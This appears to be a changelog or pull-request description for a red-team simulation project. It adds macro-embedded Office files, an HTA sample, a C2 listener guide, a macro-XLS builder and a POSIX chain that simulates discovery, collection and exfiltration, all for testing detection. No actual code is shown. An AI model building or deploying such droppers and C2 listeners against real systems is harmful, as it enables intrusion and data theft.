Adding the following:
- New DragonsTail Chain reaction that does not execute Mimikatz.
- Generic .HTA file with supporting markdown file highlighting details.
- Generic `Atomic.doc` with supporting markdown file highlighting embedded macro.
- Guide (markdown) explaining how to zip files to simulate email borne threats.
- Simple guide on how to setup a "Listener" for C2 communication in Python and Powershell.
- Generate-Macro.ps1 - Builder script that will generate 8 different macro embedded XLS files to simulate macro techniques actively being used.
* Discovery and Cleanup
* Generate docs from job=validate_atomics_generate_docs branch=Discovery
* mv discovery.bat
* Fixed Discovery.bat URLs
Updated Techniques with new location of discovery.bat
* Generate docs from job=validate_atomics_generate_docs branch=Discovery
Adding POSIX Chain Reaction that is platform aware and runs different
checks for each platform. Simulates Discovery, Collection, and
Exfiltration phases.
Argonaut was built with the idea of assisting organizations with identifying the use of Invoke-WebRequest aliases - Wget and Curl. Within your detection tools, how does it look? Do you have detection for Wget and curl on Windows?
Jesse Brown